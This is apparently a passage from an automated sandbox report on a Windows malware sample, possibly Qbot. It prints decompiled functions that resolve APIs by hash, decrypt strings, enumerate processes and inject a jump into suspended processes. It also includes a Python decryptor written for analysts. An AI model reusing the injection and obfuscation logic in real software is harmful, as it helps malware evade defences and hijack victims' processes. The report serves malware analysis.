            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
            						_t143 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
            					}
            					E00998D9A( &_v8);
            					_t113 =  *0x9af8d0; // 0x452f8c0
            					_t48 = _t192 + 0x1434; // 0x1434
            					_t199 = _t48;
            					 *_t204 = 0x209;
            					_push(_t199);
            					_push(L"USERPROFILE");
            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
            						E00999FE4(_t199, 0x105, L"%s\\%s", _t150);
            						_t141 =  *0x9af8d0; // 0x452f8c0
            						_t204 =  &(_t204[5]);
            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
            					}
            					_push(0x20a);
            					_t51 = _t192 + 0x122a; // 0x122a
            					_t151 = L"TEMP";
            					_t116 =  *0x9af8d0; // 0x452f8c0
            					_push(_t151);
            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
            						_t138 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
            					}
            					_push(0x40);
            					_t200 = L"SystemDrive";
            					_push( &_v144);
            					_t119 =  *0x9af8d0; // 0x452f8c0
            					_push(_t200);
            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
            						_t136 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
            					}
            					_v8 = 0x7f;
            					_t59 = _t192 + 0x199c; // 0x199c
            					_t123 =  *0x9af8d0; // 0x452f8c0
            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
            					_t62 = _t192 + 0x100c; // 0x100c
            					E009A35A9(E0099E34A(_t62, E0099A5D0(_t62), 0),  &_v2644);
            					_t63 = _t192 + 0x1858; // 0x1858
            					E009A357B( &_v2644, _t63, 0x20);
            					_push( &_v2644);
            					_push(0x1e);
            					_t66 = _t192 + 0x1878; // 0x1878
            					_t191 = 0x14;
            					E009998D0(_t66, _t191);
            					_t134 = E0099DB68(_t191); // executed
            					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
            					return _t192;
            				}
            				return _t68;
            			}

            APIs
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • GetCurrentProcessId.KERNEL32 ref: 0099DFE9
            • GetLastError.KERNEL32 ref: 0099E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0099E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0099E1A8
              • Part of subcall function 0099CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00990000), ref: 0099CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0099E1D3
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: ee876f40c2b865be8ba3e9b29a8a3d1ce0e0f88a8456c2d05261417abc3da434
            • Instruction ID: 61968d8127c8ca164bb16f926e8daa30c827cc8abf89c4ffe0667ae65810118e
            • Opcode Fuzzy Hash: ee876f40c2b865be8ba3e9b29a8a3d1ce0e0f88a8456c2d05261417abc3da434
            • Instruction Fuzzy Hash: B0915C71700605AFDB04EBB8DC49FEAB7E8FF49300F044169F51AD7291EB74AA448BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E0099D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
            				long _v8;
            				long _v12;
            				void* _v16;
            				intOrPtr _v23;
            				void _v24;
            				long _v28;
            				struct _CONTEXT _v744;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t57;
            				long _t59;
            				void* _t62;
            				void** _t65;
            				void* _t66;
            
            				_t65 = __edx;
            				_t57 = __ecx;
            				_t66 = 0;
            				if(E0099D309(__ecx, __edx, __edx, 0) != 0) {
            					_t33 = E0099D538( *((intOrPtr*)(__edx)), _a4); // executed
            					_t66 = _t33;
            					if(_t66 != 0) {
            						E00998F63( &_v744, 0, 0x2cc);
            						_v744.ContextFlags = 0x10002;
            						if(GetThreadContext(_t65[1],  &_v744) != 0) {
            							_t62 = _v744.Eax;
            							_v12 = _v12 & 0x00000000;
            							_v24 = 0xe9;
            							_t59 = 5;
            							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
            							_v8 = _t59;
            							_v16 = _t62;
            							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
            								L6:
            								_t66 = 0;
            							} else {
            								_v28 = _v28 & 0x00000000;
            								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
            									goto L6;
            								}
            							}
            						}
            					}
            				}
            				E0099D47C();
            				return _t66;
            			}

            APIs
              • Part of subcall function 0099D309: LoadLibraryW.KERNEL32 ref: 0099D403
              • Part of subcall function 0099D538: NtCreateSection.NTDLL(0099DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0099D5AA
              • Part of subcall function 0099D538: RegisterClassExA.USER32(?), ref: 0099D5FE
              • Part of subcall function 0099D538: CreateWindowExA.USER32 ref: 0099D629
              • Part of subcall function 0099D538: DestroyWindow.USER32(00000000), ref: 0099D634
              • Part of subcall function 0099D538: UnregisterClassA.USER32 ref: 0099D63F
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0099DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0099DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0099DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0099DAC7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: 9e5f3597e710433b88ea0a5f435dd26dc97998060794dcb93ce1f4b91dbbb2fe
            • Instruction ID: c4c74def684ccc4da16d018582cd3906b91093928ab971b2fd584a87e7e99ab3
            • Opcode Fuzzy Hash: 9e5f3597e710433b88ea0a5f435dd26dc97998060794dcb93ce1f4b91dbbb2fe
            • Instruction Fuzzy Hash: 2A313E72A0211AAFDB11DFA8CD85FEEBBBCEF48310F1441A6A505E2160D730EA14CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E0099EF38(void* __ecx, intOrPtr __edx) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v92;
            				intOrPtr _t41;
            				signed int _t47;
            				signed int _t49;
            				signed int _t51;
            				void* _t56;
            				struct HINSTANCE__* _t58;
            				_Unknown_base(*)()* _t59;
            				intOrPtr _t60;
            				void* _t62;
            				intOrPtr _t63;
            				void* _t69;
            				char _t70;
            				void* _t75;
            				CHAR* _t80;
            				void* _t82;
            
            				_t75 = __ecx;
            				_v12 = __edx;
            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
            				if(_t41 == 0) {
            					L4:
            					return 0;
            				}
            				_t62 = _t41 + __ecx;
            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
            				_t47 = 0;
            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_v8 = 0;
            				_v16 = _t63;
            				if(_t63 == 0) {
            					goto L4;
            				} else {
            					goto L2;
            				}
            				while(1) {
            					L2:
            					_t49 = E0099E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0099A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
            					_t51 = _v8;
            					if((_t49 ^ 0x218fe95b) == _v12) {
            						break;
            					}
            					_t73 = _v20;
            					_t47 = _t51 + 1;
            					_v8 = _t47;
            					if(_t47 < _v16) {
            						continue;
            					}
            					goto L4;
            				}
            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
            					return _t80;
            				} else {
            					_t56 = 0;
            					while(1) {
            						_t70 = _t80[_t56];
            						if(_t70 == 0x2e || _t70 == 0) {
            							break;
            						}
            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
            						_t56 = _t56 + 1;
            						if(_t56 < 0x40) {
            							continue;
            						}
            						break;
            					}
            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
            					if( *((char*)(_t56 + _t80)) != 0) {
            						_t80 =  &(( &(_t80[1]))[_t56]);
            					}
            					_t40 =  &_v92; // 0x6c6c642e
            					_t58 = LoadLibraryA(_t40); // executed
            					if(_t58 == 0) {
            						goto L4;
            					}
            					_t59 = GetProcAddress(_t58, _t80);
            					if(_t59 == 0) {
            						goto L4;
            					}
            					return _t59;
            				}
            			}

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0099F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0099F014
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: c528729c95636f677720bd69a6c0e7fd61215b49a22cfb6ac5db217d66bfe075
            • Instruction ID: a138aabe3b16773cd8c0033dd5e2f0ae7d6b6f84f2a7e7b16a929cae675acb93
            • Opcode Fuzzy Hash: c528729c95636f677720bd69a6c0e7fd61215b49a22cfb6ac5db217d66bfe075
            • Instruction Fuzzy Hash: 9D31C431A002559BCF24CFADC880BAEBBF9AF44304F28446AE845DB351E730DD91CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 72%
            			E0099BAF6(void* __ecx, void* __edx) {
            				void* _v304;
            				char _v308;
            				intOrPtr _v312;
            				signed int _t16;
            				signed int _t17;
            				intOrPtr _t30;
            				void* _t33;
            				intOrPtr _t38;
            				void* _t43;
            				void* _t45;
            
            				_t33 = __edx;
            				_v304 = __ecx;
            				_t16 = CreateToolhelp32Snapshot(2, 0);
            				_t45 = _t16;
            				_t17 = _t16 | 0xffffffff;
            				if(_t45 != _t17) {
            					E00998F63( &_v304, 0, 0x128);
            					_v304 = 0x128;
            					if(Process32First(_t45,  &_v304) != 0) {
            						while(1) {
            							_t43 = _v312( &_v308, _t33);
            							if(_t43 == 0) {
            								break;
            							}
            							_t38 =  *0x9af8d0; // 0x452f8c0
            							_push( &_v308);
            							_push(_t45);
            							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
            								continue;
            							}
            							break;
            						}
            						FindCloseChangeNotification(_t45);
            						_t17 = 0 | _t43 == 0x00000000;
            					} else {
            						_t30 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t30 + 0x30))(_t45);
            						_t17 = 0xfffffffe;
            					}
            				}
            				return _t17;
            			}

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0099BB14
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • Process32First.KERNEL32(00000000,?), ref: 0099BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0099BB84
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 230884831a946b503f5c07df6f637fb96520f2e4be4ab21bc88168929263c8f6
            • Instruction ID: 2d84e6dc8f8afef55de69e4f40708aff379b4572aeb0f5bc3528882346960fd1
            • Opcode Fuzzy Hash: 230884831a946b503f5c07df6f637fb96520f2e4be4ab21bc88168929263c8f6
            • Instruction Fuzzy Hash: 7C118E72204201ABD720EFACAC49E6A77ECEF85360F140A29F525C7194EB28D90487A2
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 94%
            			E0099C778(WCHAR* __ecx, WCHAR* __edx) {
            				long _v8;
            				long _v12;
            				WCHAR* _v16;
            				short _v528;
            				short _v1040;
            				short _v1552;
            				intOrPtr _t23;
            				WCHAR* _t27;
            				signed int _t29;
            				void* _t33;
            				long _t38;
            				WCHAR* _t43;
            				WCHAR* _t56;
            
            				_t44 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t43 = __edx;
            				_t56 = __ecx;
            				E00998F63(__edx, 0, 0x100);
            				_v12 = 0x100;
            				_t23 =  *0x9af8d0; // 0x452f8c0
            				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
            				lstrcpynW(__edx,  &_v528, 0x100);
            				_t27 = E00999F85(_t44, 0x978);
            				_v16 = _t27;
            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
            				asm("sbb eax, eax");
            				_v8 = _v8 &  ~_t29;
            				E00998D9A( &_v16);
            				_t33 = E0099A5E9(_t43);
            				E00999FE4( &(_t43[E0099A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
            				lstrcatW(_t43, _t56);
            				_t38 = E0099A5E9(_t43);
            				_v12 = _t38;
            				CharUpperBuffW(_t43, _t38);
            				return E0099E34A(_t43, E0099A5E9(_t43) + _t40, 0);
            			}

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0099C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0099C7F1
              • Part of subcall function 00999FE4: _vsnwprintf.MSVCRT ref: 0099A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0099C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0099C83C
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 4281b1d86804942503b8baa14d4e268808678270d45dfe98568d3874e181022c
            • Instruction ID: be13d77ab29925e2fddefa0b2ca7c4a5f734a62924cd13ac8bdae1c77fceae14
            • Opcode Fuzzy Hash: 4281b1d86804942503b8baa14d4e268808678270d45dfe98568d3874e181022c
            • Instruction Fuzzy Hash: E92158B2A10214BFDB10ABA8DC4AFAE77BCEFD5310F104169F505D6181EA745E0487A1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 80%
            			E00998BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v28;
            				short _v44;
            				void* _t38;
            				intOrPtr _t47;
            				void* _t53;
            				intOrPtr _t54;
            				intOrPtr _t55;
            				intOrPtr _t56;
            				void* _t58;
            				intOrPtr _t59;
            				void* _t62;
            				void* _t64;
            				signed int _t71;
            				signed int _t74;
            				void* _t76;
            				void* _t77;
            
            				_t71 = _a12;
            				_t53 = __edx;
            				_v8 = __ecx;
            				_t74 = _t71;
            				if(_t71 >= __edx) {
            					L4:
            					_t54 = 0x9af94e;
            					L5:
            					_t58 = 0;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					asm("movsb");
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					asm("stosw");
            					asm("stosb");
            					_t38 = 0;
            					if(_v28 == 0) {
            						L8:
            						_t64 = _t38;
            						if(_t64 == 0) {
            							L10:
            							lstrlenW( &_v44);
            							return _t54;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t19 = _t58 + 0x30; // 0x30
            							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
            							_t58 = _t58 + 1;
            						} while (_t58 < _t64);
            						goto L10;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t38 = _t38 + 1;
            					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
            					_t64 = 0xe;
            					if(_t38 > _t64) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t59 = _a4;
            				_a12 = 0x5a;
            				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
            					_t74 = _t74 + 1;
            					if(_t74 < _t53) {
            						continue;
            					}
            					goto L4;
            				}
            				_t76 = _t74 - _t71;
            				if(_t76 == 0) {
            					goto L4;
            				}
            				_t47 = E00998DC9(_t76 + 1); // executed
            				_t55 = _t47;
            				_v12 = _t55;
            				if(_t55 != 0) {
            					_t56 = _a4;
            					_t62 = _t55 - _t71;
            					do {
            						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
            						_t71 = _t71 + 1;
            						_t76 = _t76 - 1;
            					} while (_t76 != 0);
            					_t54 = _v12;
            					goto L5;
            				}
            				return 0x9af94e;
            			}
            • Address column: 0x00998bd6 to 0x00998c9b (one address per line of the listing above, 0x00000000 for lines without one), rendered beside the C code in the original report.

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,009ACA88), ref: 00998C50
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 3ad7758e52b9942a3da114a08322f3da75864f25a887400351f3d6e77a8498fc
            • Instruction ID: 529b187210ebc45f3c439155cbd47d7792e0cbc9b0dcf7b6e45022eeff1fb312
            • Opcode Fuzzy Hash: 3ad7758e52b9942a3da114a08322f3da75864f25a887400351f3d6e77a8498fc
            • Instruction Fuzzy Hash: F4210431B056456FCF14CFACC8801AFBB6ABF9F310B28447CD981AB201EA309D4687E0
            Uniqueness

            Uniqueness Score: -1.00%
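Worked example of the string decryption that E00998BCD above implements. This is an added example, not code from the report or from the sample. In the listing, _v8 is the encrypted blob, _a4 the key, _a12 the start offset and __edx the blob length: the routine scans forward from the offset until key[i % 0x5A] equals blob[i] (the decrypted byte is 0), allocates length+1 bytes and XORs that run into the new buffer. The key length 0x5A (90) is taken from the `_a12 = 0x5a` store; the key and strings below are constructed for the demo and are not recovered from the sample.

```python
"""Qbot-style XOR string decryption, modelled on E00998BCD.

Added example; not code from the report or the sample. Key length 0x5A is
the `_a12 = 0x5a` constant in the listing; key and strings are constructed.
"""
from typing import List, Optional

KEY_LEN = 0x5A  # _a12 = 0x5a in the listing


def decrypt_at(blob: bytes, key: bytes, offset: int) -> Optional[str]:
    """Decrypt the NUL-terminated string that starts at `offset`.

    Returns None where the listing returns its placeholder pointer
    (0x9af94e): offset past the end, no terminator before the end of
    the blob, or a zero-length string.
    """
    if len(key) < KEY_LEN:
        raise ValueError("key shorter than 0x5A bytes")
    if offset >= len(blob):
        return None
    i = offset
    # The key index is the absolute blob index mod KEY_LEN, not the
    # index within the string; that is what `_t74 % _a12` does.
    while key[i % KEY_LEN] != blob[i]:
        i += 1
        if i >= len(blob):
            return None
    length = i - offset
    if length == 0:
        return None
    plain = bytes(blob[j] ^ key[j % KEY_LEN] for j in range(offset, i))
    return plain.decode("latin-1")


def decrypt_all(blob: bytes, key: bytes) -> List[str]:
    """Walk the blob from offset 0 and return every string in order.

    Empty strings (two adjacent terminators) are skipped rather than
    treated as failure; the listing itself bails out on them.
    """
    out: List[str] = []
    offset = 0
    while offset < len(blob):
        if blob[offset] == key[offset % KEY_LEN]:
            offset += 1
            continue
        s = decrypt_at(blob, key, offset)
        if s is None:
            break
        out.append(s)
        offset += len(s) + 1  # skip the terminator
    return out


def encrypt_table(strings: List[str], key: bytes) -> bytes:
    """Inverse transform, used only to build demo input."""
    plain = b"".join(s.encode("latin-1") + b"\x00" for s in strings)
    return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(plain))


if __name__ == "__main__":
    # Constructed key and table, not the sample's.
    demo_key = bytes((i * 7 + 3) & 0xFF for i in range(KEY_LEN))
    demo_blob = encrypt_table(["kernel32.dll", "VirtualAlloc"], demo_key)
    for s in decrypt_all(demo_blob, demo_key):
        print(s)
```

Because the key index is the absolute offset into the blob, a string cannot be decrypted in isolation without knowing where it sits in the table; an extractor has to walk the whole blob from offset 0 as `decrypt_all` does.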

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 99c986-99c9a6 GetTokenInformation 235 99c9a8-99c9b1 GetLastError 234->235 236 99c9ec 234->236 235->236 237 99c9b3-99c9c3 call 998dc9 235->237 238 99c9ee-99c9f2 236->238 241 99c9c9-99c9dc GetTokenInformation 237->241 242 99c9c5-99c9c7 237->242 241->236 243 99c9de-99c9ea call 998ddf 241->243 242->238 243->242
            C-Code - Quality: 86%
            			E0099C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
            				long _v8;
            				void* _v12;
            				void* _t12;
            				void* _t20;
            				void* _t22;
            				union _TOKEN_INFORMATION_CLASS _t28;
            				void* _t31;
            
            				_push(_t22);
            				_push(_t22);
            				_t31 = 0;
            				_t28 = __edx;
            				_t20 = _t22;
            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L6:
            					_t12 = _t31;
            				} else {
            					_t31 = E00998DC9(_v8);
            					_v12 = _t31;
            					if(_t31 != 0) {
            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
            							goto L6;
            						} else {
            							E00998DDF( &_v12, _t16);
            							goto L3;
            						}
            					} else {
            						L3:
            						_t12 = 0;
            					}
            				}
            				return _t12;
            			}
            • Address column: 0x0099c989 to 0x0099c9f2 (one address per line of the listing above, 0x00000000 for lines without one), rendered beside the C code in the original report.

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00990000,00000000,00000000,?,0099CA07,00000000,00000000,?,0099CA30), ref: 0099C9A1
            • GetLastError.KERNEL32(?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9A8
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9D7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: b463c7fbb12d3fbc12775ef71f704f906061fed8a81d11afcc634249dc3e84df
            • Instruction ID: e30f77c57975d25b672e220c45c2dcbc85118bd55aa271676fa36359df2867a9
            • Opcode Fuzzy Hash: b463c7fbb12d3fbc12775ef71f704f906061fed8a81d11afcc634249dc3e84df
            • Instruction Fuzzy Hash: 8301D6B2600114BF8F205BADDC49E9B7FACDF667A17200425F405D3111EA31DD0097A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 99be10-99be5f call 998f63 * 2 CreateProcessW
            C-Code - Quality: 79%
            			E0099BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
            				struct _STARTUPINFOW _v72;
            				signed int _t11;
            
            				E00998F63(__edx, 0, 0x10);
            				E00998F63( &_v72, 0, 0x44);
            				_v72.cb = 0x44;
            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
            				asm("sbb eax, eax");
            				return  ~( ~_t11) - 1;
            			}
            • Address column: 0x0099be21 to 0x0099be5f (one address per line of the listing above), rendered beside the C code in the original report.

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0099BE52
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: b5b13e0e91431c864460c21901997249b5501692a1cb0338e0f93dddb560a092
            • Instruction ID: 63124b4172cb5879dace52dbe666b2a467c2fd2de2bdc0f5242ce3d77fba4a06
            • Opcode Fuzzy Hash: b5b13e0e91431c864460c21901997249b5501692a1cb0338e0f93dddb560a092
            • Instruction Fuzzy Hash: A8F037F164420C7EFA20E659CC0AFBF36ACDB81710F5001297A05E71D0E9A4AD0582A5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 251 99d889-99d8a9 call 99d7cd 254 99d9da-99d9dd 251->254 255 99d8af-99d8ce call 99b6e3 251->255 258 99d9ca-99d9d9 call 998ddf 255->258 259 99d8d4-99d8d6 255->259 258->254 261 99d9b8-99d9c8 call 998ddf 259->261 262 99d8dc-99d8de 259->262 261->258 263 99d8e1-99d8e3 262->263 266 99d8e9-99d908 call 998f63 call 99be10 263->266 267 99d9a6-99d9b2 263->267 273 99d96a-99d96e 266->273 274 99d90a-99d91d call 99d9de 266->274 267->259 267->261 275 99d999-99d9a0 273->275 276 99d970-99d972 273->276 274->273 281 99d91f-99d937 274->281 275->263 275->267 278 99d983-99d993 276->278 279 99d974-99d97a 276->279 278->275 279->278 284 99d939-99d94e GetLastError call 99dadc 281->284 285 99d967 281->285 288 99d950-99d95b 284->288 289 99d963-99d964 FindCloseChangeNotification 284->289 285->273 291 99d95d 288->291 292 99d95e 288->292 289->285 291->292 292->289
            C-Code - Quality: 96%
            			E0099D889(intOrPtr __edx) {
            				intOrPtr _v8;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				char _v24;
            				intOrPtr _v36;
            				char _v40;
            				char _v80;
            				char _t37;
            				intOrPtr _t38;
            				signed int _t45;
            				void* _t49;
            				intOrPtr _t50;
            				intOrPtr _t52;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t59;
            				void* _t62;
            				intOrPtr _t63;
            				signed int _t67;
            				intOrPtr _t69;
            				void* _t70;
            				intOrPtr _t86;
            				char _t87;
            				void* _t88;
            
            				_v16 = _v16 & 0x00000000;
            				_v20 = __edx;
            				_t86 = 0;
            				_t37 = E0099D7CD( &_v16, __edx);
            				_t87 = _t37;
            				_v24 = _t87;
            				_t89 = _t87;
            				if(_t87 == 0) {
            					return _t37;
            				}
            				_t38 =  *0x9af8d4; // 0x452fc00
            				E0099B6E3( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t89);
            				_v12 = _v12 & 0;
            				_t67 = _v16;
            				if(_t67 == 0) {
            					L21:
            					E00998DDF( &_v24, 0);
            					return _t86;
            				}
            				while(_t86 == 0) {
            					_t69 = 0;
            					_v8 = 0;
            					while(_t86 == 0) {
            						E00998F63( &_v40, _t86, 0x10);
            						_t88 = _t88 + 0xc;
            						_t49 = E0099BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
            						_t94 = _t49;
            						if(_t49 >= 0) {
            							_t56 = E0099D9DE(E00996297,  &_v40, _t94, _v20); // executed
            							if(_t56 != 0) {
            								_t59 =  *0x9af8d0; // 0x452f8c0
